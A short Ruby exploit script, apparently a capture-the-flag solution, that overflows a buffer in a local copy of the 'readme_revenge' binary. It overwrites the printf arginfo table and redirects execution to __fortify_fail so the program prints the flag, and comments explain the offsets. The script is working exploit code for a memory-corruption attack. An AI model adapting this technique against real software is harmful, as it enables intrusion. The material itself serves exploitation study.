# encoding: ASCII-8BIT
#
# Proof-of-concept exploit script for a *local* copy of the `readme_revenge`
# binary, served on TCP port 2323 via the socat command below. Every address
# in this file is a hard-coded constant taken from that specific binary, so the
# script only makes sense against a fixed (presumably non-PIE) memory layout and
# is not portable to any other build. The magic comment on line 1 keeps the
# string literals binary; this is assumed to be so they concatenate with the
# raw bytes returned by p64 without encoding mismatches.
#
# Defensive reading: the payload pads 1000 bytes before its first overwrite,
# which suggests a ~1000-byte buffer overrun in the target — confirm against the
# binary. Position-independent code / ASLR and bounded input handling remove
# the preconditions this script relies on.
#
# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./readme_revenge
# ruby pwn.rb
require 'pwn'
# Target is 64-bit; p64 below packs little-endian 8-byte words for this arch.
context.arch = 'amd64'
# :debug makes the Sock helper print every byte sent, which is the only
# feedback this script gives (it never reads a response).
context.log_level = :debug
# Connects to the local listener only; there is no target argument.
z = Sock.new 'localhost', 2323
# shellcode = p8(0x90) * 8
payload = ""
# 1000 bytes of filler before the first overwritten word.
payload += 'A' * 1000
# payload += cyclic 112
# payload += shellcode
# payload += 'A' * (1000 - 112 - shellcode.length)
payload += p64 0x4359d0 # address to jump to, __fortify_fail
# 0x6b73e0 is presumably where the sent buffer lives in the target; the sum
# (1000 + 8 + 432 + 8 = 1448) is the offset of the "flag" word below within
# this payload, so flag_addr points at that word — verify against the binary.
flag_addr = 0x6b73e0 + 1000 + 8 + 432 + 8
# Only needed to trigger redirection, most of this
# could be anywhere in the buffer we send
payload += 'B' * 432
payload += p64 flag_addr # pointer to char*
payload += p64 0x6b4040 # flag
# 608 - 432 - 16 = 160 bytes, so the region after the jump address is exactly
# 608 bytes long before the zero word that follows.
payload += 'C' * (608 - 432 - 16)
payload += p64(0) # offset 1000 + 8 + 608 must be 0, else segfault
payload += 'D' * 112
payload += p64 0x6b7430 # printf arginfo table
#payload += cyclic 1000
# Fire-and-forget: nothing is read back and the socket is never closed
# explicitly; it is released when the process exits.
z.send payload
# This works but the program crashes after printing the flag ¯\_(ツ)_/¯
# z.send(cyclic(1000) + p64(0x6b7450) + 'A' * 608 + p64(0) + cyclic(112) + p64(0x6b7430))